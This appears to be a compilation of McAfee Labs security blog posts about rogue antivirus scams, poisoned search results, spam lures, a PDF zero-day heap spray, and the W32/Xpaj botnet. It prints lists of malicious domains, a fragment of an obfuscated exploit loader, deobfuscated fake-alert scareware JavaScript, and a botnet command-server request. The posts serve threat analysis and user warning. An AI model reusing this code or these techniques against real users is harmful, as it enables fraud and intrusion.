Update: McAfee’s legal team contacted the domain registrars, who swiftly brought down the site to spare unsuspecting surfers from becoming victims to this imposter. Detection is available beginning with the 5793 DATs as FakeAlert-MaCatte.

Warning to all Pacquaio and Cotto fans. Bad guys are taking advantage of their upcoming fight. Searching for “Pacquiao vs Cotto” could lead to fake anti-virus programs.

Similar to the scam described at Arun Pradeep’s blog post. Once the search result is clicked, users are redirected to a website showing a fake online malware scanning and warns users that their systems are infected. It would then ask to install an anti-virus program to remove the malware.

This fake online scanning is seen hosted at the following domains:

• secure-pcprotection.net
• examinedicho.com

This malware is now detected as FakeAlert-AB. Always update your security product and be extra careful when accessing unknown sites.

The idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Big Bird’s birthday.

It’s not new that the Google logo includes Big Bird; it does so on special occasions. The Google logo clearly shows Today’s Hot Trends, and that’s a target for malware writers.

This year is the fortieth anniversary of Sesame Street, and the bad guys have begun their attack. Searching for keywords such as Big Bird’s birthday and Big Bird on Google displays pages with compromised sites.

Watch the video below, which shows how rogue anti-spyware attacks a system.

The video shows that the malware is literally pushed onto the system regardless of what the user does. In the past we have seen malware injected into a compromised site through exploits and iframes. Today, malware often attacks only from a search-results page. In certain attacks, if a user directly accesses a compromised site, then there’s no redirection to a payload and no infection.

Users have no idea what they will get by clicking on search results, which now are like a virtual minefield; you never know what will happen next. McAfee strives to protect users from such attacks through its free SiteAdvisor technology. It warns users with green, yellow, and red alerts next to each search result. You can minimize your risk of attack by using SiteAdvisor and paying attention to what you are clicking on.

We all know the dangers of peer-to-peer (P2P) networks and their role in distributing malware. Most people who deal with this problem work tirelessly to limit the impact of these potential threat points by (among other things) adding anti-virus, firewalling, watching network flows for P2P traffic, and usually outright banning of P2P applications.

They may, however, be looking the wrong way. The bits and bytes flow in two directions–in and out. Data leakage from a network is just as serious as bringing in malware-laden MP3s, cracked software, or Mov files.

You may be thinking to yourself, “Yeah, but leaking information is for disgruntled employees, or those looking to profit from foreign spies being ‘in the market’ for specific secret data. I don’t employ people who would do that.”

For arguments sake, let’s say that you do in fact employ workers who are of the highest moral character, you’ve firewalled the outside, banned the applications, monitor the network traffic, and updated your anti-virus signatures.

So what happens when one of your employees is out sick–yet a big presentation is still due on Friday? Any chance he or she may take work home to finish when “there just aren’t enough hours in the day”?

The vector does not even need to be company-owned. If an employee is emailed the presentation, or copies it onto a USB device, this is the time that the data is the most vulnerable–it’s out of your control. Most home users do not implement the same security practices that a company does. If that data is moved into a directory reachable by the P2P application, it is reachable by potentially millions of users on the same P2P network. Do you think a file called OurSecretFormula.doc would look enticing?

For those ever-present naysayers, here is a recent example of this occurring.

So the moral of this story is not that this is new or ground breaking–it certainly isn’t. It’s just a reminder to look both ways.

It didn’t take long for spammers to change from Halloween lures to spam and malware. They’ve already moved to the Christmas season, and we have started to see emails from the Cutwail botnet that are using a Christmas theme to trick users into visiting malicious websites. Spammers must be trying to beat retailers to the advertising punch this year.

The campaign we are currently monitoring uses subject lines that try to get users to visit websites selling fake jewelry and Rolexes. These spammers aren’t cheap either. Only the best will do for their customers–brands such as Cartier, Gucci, and Tag Heuer are on “sale” to all who would be fooled.

They even went so far as to include a logo to the Better Business Bureau and a “Hacker Safe” image on their site. Ironic, isn’t it?

This and similar sites are part of a campaign to steal your credit card information and identity. With the holiday shopping season rushing toward us, be sure to exercise extreme diligence regarding businesses you give your sensitive information to. The tricks that criminals use during the holiday season will be difficult to discern from legitimate marketing.

How can you stay safe? Avoid clicking links in emails. If you want to visit your favorite retail site to check out their holiday specials, type the address directly into the address bar. Most legitimate sites will not force you to click a link within an email to take advantage of their latest deals.

We have already discussed the Facebook phishing campaign. Now the scammers are using the phishing campaign not just for spamming but also for a “cocktail” attack.

• The scammers have targeted Facebook, telling them that the Facebook account passwords have been changed.
• The malware downloads a keylogger to collect credit card numbers, social security number, and other passwords from the victims’ machines.
• The malware pushes a fake security product, which disables many applications, such as Notepad, Wordpad, etc., until the bad guys are paid.

This phishing campaign attempts to convince users that the email comes from Facebook by forging the From: address.

The mail claims the password has been changed and that it is available in the attached zip file. Once the victims unzip it, they see a file with a spreadsheet icon. When the victim tries to open the file to look for a password, it drops the payload and deletes itself. Once the malware is installed, it establishes a connection to the attacker’s server through the HTTP port and attempts to download more payloads onto the infected machine.

The malware also downloads a keylogger and runs it covertly. The second attack hunts for any keystroke so that it can collect information such as the login ID password, credit card and socialsSecurity numbers, etc. The malware sends the data to a remote server through a backdoor it creates. But this is not yet the end of the game.

While this data theft occurs, the malware also tries to download a fake security product. The rogue application that enters through the backdoor will be covertly installed on the victim’s machine. Once installed, the fake product runs a service that kills almost all open applications: Notepad, Calculator, Registry Editor, Task Manager, and others. (It does not kill Internet Explorer because it needs IE to to communicate with the malware server.) After killing these apps, the malware shows a fake alert–claiming the application you’re trying to open is being used to connect to a malware server. (See image below.)

Phishing campaigns on social networking sites are not new. Scammers are not satisfied only pushing spam to sell “Canadian” pills. Now they also want to sell fake security products, and they need all of our passwords. With McAfee coverage, you’ll be protected against this cocktail attack.

Today, Microsoft’s Security Intelligence Report is out, and it’s no surprise that it’s littered with fake AV/security product threats–four out of the top five threats in the United States, no less. Let me show you that with a keen eye and our threat intelligence databases, the same group are responsible for a diverse set of criminal activity online, all at the same time.

I’m a little pedantic about the Queen’s English from time to time, and like most people I also make mistakes. However, this little spelling error caught my eye and a quick Google proves it’s gone unnoticed by the owners for quite a while, too.

I was doing a little research into some DSL IPs being abused at the moment and spotted the misspelling acess in this broken English phrase taken from the terms of service of a fake AV website:

“If acess services is unavailable during the subscription period, the member has the right for a refund of subscription fee.”

Google-dorking it with quotes so we get the exact phrase [link] reveals 141 sites that Google knows of. Misspelling access is hardly a crime, but copying the whole phrase is a little odd, isn’t it?

Take a look at the terms and conditions page of advanced-virus-remover2009 .com. (Visiting this site is bad for your health.)

And also the customer service page of this extreme porn site (incest-related domain redacted for obvious reasons):

These are sites that announce new content frequently, but the 18 U.S.C. 2257 record-keeping statements say that the content is ineligible–as it was created prior to July 3, 1995. Aand they don’t ask for your date of birth when you sign up, either. (The signs are always there!)

…and one of the promotional affiliate networks for a network of porn sites:

…and the world-renowned Data Backuper software from databackuper .com

These are old sites, so let’s be realistic here: It’s just a template. The bad guys are just lazy (or efficient, depending on your point of view) when it comes to their websites. As proof, if more were needed, advanced-virus-remover-2010 .com registered a day or two ago and is exactly the same.

(Old techniques die hard, eh? )

The same group(s) are undoubtedly connected with the recent tsunami spam that’s spreading more fake-alert malware–given the domain overlap below with this detailed VIL’s hosts-file infection data: http://vil.nai.com/vil/content/v_162829.htm

Lastly let’s take a look at their most recent flurry of fake-AV/codec/crypto&porn domains.
(Again, don’t visit; just read.)

0-vs-codec-pro .com
10-open-davinci .com
1-open-davinci .com
1-vs-codec-pro .com
2-open-davinci .com
2-vs-codec-pro .com
3-open-davinci .com
3-vs-codec-pro .com
5-open-davinci .com
6-open-davinci .com
advanced-virus-remover-2009 .com
advanced-virus-remover2009 .com
advanced-virusremover-2009 .com
advanced-virusremover2009 .com
advancedvirus-remover-2009 .com
advancedvirus-remover2009 .com
advancedvirusremover-2009 .com
advanced-virus-remover-2010 .com
advanced-virus-remover2010 .com
anti-virus-xp-pro2009 .com
bastaproject .com
best-scan .com
best-scan .net
best-scan-pc .com
best-scanpc .com
best-scan-pc .net
best-scanpc .net
best-scan-pc .org
best-scanpc .org
bestvsprog .net
coolcodec .net
coolcount1 .com
coolprojectnew .com
downloadavr3 .com
downloadavr4 .com
downloadavr5 .com
downloadavr6 .com
downloadavr7 .com
downloadavr8 .com
greatcrypt .com
hard-xxx-tube .com
maindavinchi .com
mainvscodec .net
megacryptnew .com
onlinescanxppro .com
open-davinci .net
rims-shop .com
testavrdown .com
testavrdownnew .com
trucount3005 .com
trucountme .com
vscodec-pro .net
vsproject .net
xxx-white-tube .net
xxx-white-tube .org

Quite a diverse set, eh? The pornographic content is managed somewhat separately, and I really don’t want to make extra work for our legal team with this one!

I doubt that’s all we’ll see this week. Passive DNS monitoring also shows that many of these are unused so far.

There will be more on this one, I’m sure.

Festive search words are a favorite with scammers as a lure to their offerings, as my colleague David Marcus recently warned us about Halloween-themed threats.

In recent research, we have found that search results for “scary halloween pumpkin designs” could lead users to a hijacked web page that hosts rogue security products.

Upon clicking the hyperlink, the user sees a website hosted on xxx.allxxxxxshxxx.com. The site presents a fake “Windows Security Alert” window that is identical to the scam reported by McAfee Labs’ Avelino Rico Jr. in his recent blog. The “alert” warns visitors of fake infections and requires the victims to download a tool to remove them.

What happens after installing this tool is the same as many other rogue AV or FakeAlert stories we’ve reported. This malware is now detected as FakeAlert-JW Trojan.

Watch out for this and other malware during Halloween season, and keep your security products updated.

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Here’s another:

And our favorite with a holiday spin:

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Keep your security updated and search safely this week!

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending of your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how those malwares usually spread:

This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click enter, the app will exit. But, in the background it will message all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

and

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The dropbox on the login name doesn’t work
4) The status drop box doesn’t work
5,6,7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Little boy trapped in balloon
Balloon boy died
balloon kid’s full story
Boy-balloon-madness
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was made by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

Explaining that Innovative has more than 600 employees in real offices, subsidiaries in various countries such as India, Poland, Canada, United States, and Argentina and complete with customer-calling centers, Dirk said the company received approximately 4.5 million order IDs in 11 months or, in other words, US$180 million dollars (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appears to be a legitimate front. Following its legal troubles, it is now a defunct company; yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented an events timeline of the Eastern European carding underground:

He discussed CarderPlanet, and its hierarchical structure set up like a mafia (and the source for the following image: NICSA-FBI-SSA, Michael J. McKeown )

CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

• In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to the Ukraine and Russia.
• In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
• This month in the United States, the FBI announced the results of the Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identify theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

Spammers are always looking for techniques that can beat the spam filters. We have seen various techniques for spamming–like obfuscating words, embedding text in images, spoofing urls, abusing social networking sites, and many other techniques for spam to avoid getting caught.

One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

Example:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever thing is that each line has some random characters with _ and | characters, which do not resemble any part of the word replica. If we take the entire picture into consideration, though, our eyes can read it as a word. The spammers try to take advantage of this to pass through spam filters and deliver their intended message.

Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

ASCII art spam is not limited to only nonword characters. It can be numbers, alphabets, and combinations of both, which can make things even worse for certain spam filters:

dP""b8  88     db     88     88  dP"Y8
dP      88    dPYb    88     88 `bo
Yb      88   dP__Yb   88     88   `Y8b
 YboodP 88  dP""""Yb  88ood8 88  8bodP'

In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.

This spam campaign calls into question whether Obama deserved to win the prize and that the country is suffering significant fallout as a result. The email then requests that users click or copy/paste a link into their browsers that will direct them to a website where they can download more information.

If users click on the link, they are brought to a site where they see an image of Obama followed by a notification that their download will start shortly. Remember users believe that they are going to be downloading a report on the unrest created by Obama’s acceptance of the award.

Five seconds after the page loads, users are prompted to download the file Obama_NobelPrize.exe. That is not the end of the story, however. Because users might not want to download an executable file, there is an extra bit of fun embedded within this page. Located at the bottom of the page is a little snippet of encoded JavaScript that looks like this:

Decoding this JavaScript reveals that this page also attempts to silently load an iframe hosted on the tokyopharmm.com domain. The iframe attempts to load a series of PDF exploits to inject a password-stealing Trojan onto the user’s PC. We currently identifiy this Trojan as Generic PWS.y!hv.i.

This is another example in which current news stories are used to lure users into downloading malware. It’s a popular tactic that is repeated over and over, but it continues to work due to its obvious successes. Even if you think you are going to outwit the malware authors by visiting their website but not download files, the page could be executing JavaScript in the background. Those scripts open other pages/sites via invisible iframes and test your machine for zero-day vulnerabilities and exploit them.

Client-side exploitation continues to be a popular attack vector. Another zero-day attack has targeted Adobe Acrobat Reader to infiltrate customer networks. The currently unpatched exploit opens the door to code execution when a victim simply reads a malicious PDF document.

This JavaScript code is viewable only if the stream had been unpacked, as can be seen in this FileInsight screenshot:

Although the content of the compressed stream may look like random data, when unpacked the JavaScript code will fill a certain memory area with malicious x86 assembly code and cause the exploited Adobe software to execute this shellcode–commonly know as a heap spray.

To determine the final intent of the shellcode, we have to remove another obfuscation layer that attempts to evade automated detection. The machine code is embedded as a “malformed” and “escaped” sequence of hex bytes. Any occurrence of the substring “XX” is replaced with “%u” before JavaScript can convert the string back into binary, executable code.

After loading it into a disassembler, we can see that the unescaped executable code is stage one of a two-stage attack. The intent of stage one is to identify the open file handle of the malicious PDF to find a particular signature (which is called an egg by exploit writers). This signature (0×0A666F65 in this example) is immediately followed by stage two of the shellcode and is then branched into.

The screenshot below shows the presence of the PDF’s embedded egg, followed by x86 machine code, part of stage 2. The code contains another obfuscation layer, namely a routine that XOR decodes the remaining code and–surprise, surprise–unveils an embedded executable!

The hidden executable, which is visible only in a hex editor after having applied the same XOR decoding, is written to disk and executed by the shellcode–thus highlighting the steps the attacker has taken to evade detection.

McAfee Gateway Anti-Malware detected and blocked this threat proactively (“BehavesLike.PDF.Suspicious” and the embedded executable as “BehavesLike.Win32.Rootkit.H”). McAfee Artemis and the 5766 DATs block it, as well.

<<<<<<<<<< Update Late October, 13, 2009 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Adobe has released a patch that remediates the above issue. Full details available here.

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

The report can be downloaded here.

Two weeks ago I blogged about a new virus–W32/Xpaj–found in the wild by McAfee researchers and actively spreading around the world. Since then we have closely monitored the change in spread and severity of the virus, improved generic detection for future W32/Xpaj instances, and added cleaning and proper repair for all the files infected by the virus. Today I want to share more news related to this threat.

Further analysis has revealed some interesting details about the malicious behavior of W32/Xpaj. The Virus is building a widespread “zombie” network, by taking control thousands of Internet-connected computers. The new botnet is in its infancy, although thousands of machines have been infected during last two weeks. The botnet infects computers around the world and has spread across many countries. The attacks are mostly aimed at enterprises, but they have now spread to consumer machines as well. Based on multiple characteristics and our own research, the virus is most probably the work of eastern European cybercriminals.

Most bots are connected to a central location from where one machine can control the entire botnet. W32/Xpaj, on the other hand, deploys several control channels to communicate and control its bots. It employs the same techniques used by Srizbi and Conficker; that is, it uses randomly generated DNS names for backup control servers. Even though W32/Xpaj does not know where the control server is, it knows how to search for it, making it possible to predict which host is in use on a given day.

To prevent botnet hijacking, W32/Xpaj accepts only digitally signed payloads and commands. Malware authors use a cryptographic hash (MD5 algorithm) to validate the authenticity of any payload received from the control server).

Our analysis has not revealed any cryptology system to protect the payload, thus there is a chance for a rival to take control of the entire botnet.

The W32/Xpaj variants we analyzed use a sophisticated domain-generation algorithm to create and query the list of random domains starting on September 24. The virus first tries to resolve the domain name to an IP address. If that succeeds, it sends an HTTP request in the form of a string:

/GET /up.php?a=g2&cm=15A91F71

The malicious host responds with the path to a binary containing further instructions and code to be executed:

http://[infected]/stamm/stamm.dat
http://[infected]/plugin/plugin.dat

The first binary containing malicious instruction has already been received by all W32/Xpaj-infected machines. The virus stores the downloaded encrypted binary in the Windows folder. After decryption, the malicious code executes and instructs the virus to gather information about the infected machine and report to the server, sending the victim’s IP address, machine name, host process, registry records, current home page, and even fonts and path variables.

Every time an infected machine receives a payload and executes malicious code, a marker (a file with a random name) is created in the Windows folder, preventing the virus from executing the same payload twice.

Botnets grow and evolve quickly. We measure them by the number of compromised computers under their control. However, proactive virus detection and following these simple recommendations will help prevent your computer from becoming a part of a botnet:

• Keep your anti-virus software up to date
• Apply all the latest security patches and keep your operating system up to date
• Set up a firewall to block unauthorized access while you are connected to the Internet. Use strict firewall policies and allow only those connections–both incoming and outgoing–that are absolutely necessary for your business.

Although many security vendors struggled to release new signatures and cleaning support for this virus, McAfee customers are already protected. You will hear a lot more from us in the coming months, so stay tuned and keep reading our blogs.

Thanks to Abhishek Karnik, Rachit Mathur, Di Tian, Ivan Teblin, and Adrian Dunbar for their help in analyzing and defeating this threat.

I am excited to be involved in the joint industry effort of defining an XML format which will allow for the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) and under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should have the link at the top of the list – IEEE ICSG .

There were about 20 people from multiple security companies who contributed to the development of the proposal for the standard and I am very pleased with the results. It is a simple, flexible and powerful format that is already being used by 4 anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains, IPs will open endless possibilities for improving the security of all Internet users.

For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

But there are huge benefits even in trivial transmitting of the simplest malware prevalence data:

• If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
• If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
• If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

Here is how a portion of the XML with meta-data looks like.

If you are interested - the complete XML schema is available here and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:

Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:

What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

This is a snippet of the exploit being loaded:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

And this is a snippet of an interesting part of the unobfuscated version of the exploit:

{kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
kPromo.alerts.windows.length:"alert_window_0";
kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
(kPromo.document.getDocumentElementByID(e));
kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].


The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

Recently, we analysed samples of a new fake anti-virus program that brands itself as Alpha Antivirus. This program uses the following filenames: alphaav.exe and msnaoladdon.dll.

Alpha Antivirus is a new FakeAlert variant evolved from the Personal Antivirus family of rogue anti-virus software. Like many FakeAlert malware, Alpha Antivirus promotes itself through the use of pop-up web pages hosted on malicious websites. These web pages mimic a Windows Explorer folder and a Windows Security Alert dialog, and perform a free but fake online scanning of the affected system.

The following domains were known to host the fake online-scanning web pages and the main executable of Alpha Antivirus:

• mycompinfo17.com
• internetantivirusproscanner.com
• mycomputeronlinescan11.com
• internetsecurityscan.com
• mycompscanner07.com
• mycompscanner42.com
• internetantivirusproscan.com
• windowsdefenderupdate5.com
• securitybugfixupdate6.com

The software prompts the user to install Alpha Antivirus. Once executed, it launches fake scanning and reports multiple infections:

It also displays misleading pop-up warnings on the Windows taskbar.

This variant drops a copy of itself as %ProgramFiles%\AlphaAV\AlphaAV.exe and a msnaoladdon.dll component in the Windows System folder, and installs the DLL file as a browser helper object.

(%ProgramFiles% refers to the Programs folder, for example, C:\Program Files.)

AlphaAV.exe is detected as FakeAlert-DI, while msnaoladdon.dll is detected as FakeAlert-EQ.

Frequently, we see abrupt changes in branding, filenames, and GUIs used by the same fake anti-virus programs. As more security vendors and researchers publish their findings about new rogue anti-virus programs, malware authors try to repackage their “products” with new brand names and filenames and try to use more obfuscation and encryption on their files in an attempt to avoid being recognised by users and in some cases evade detection by security vendors.

Some known brand name and filename changes:

1. From pav.exe + winexplorer.dll to personalav.exe + msxmlm.dll. (Personal Antivirus), and again to alphaav.exe + msnaoladdon.dll (Alpha Antivirus)

2. From frmwrk32.exe to winupdate.exe (Antivirus XP/Pro)

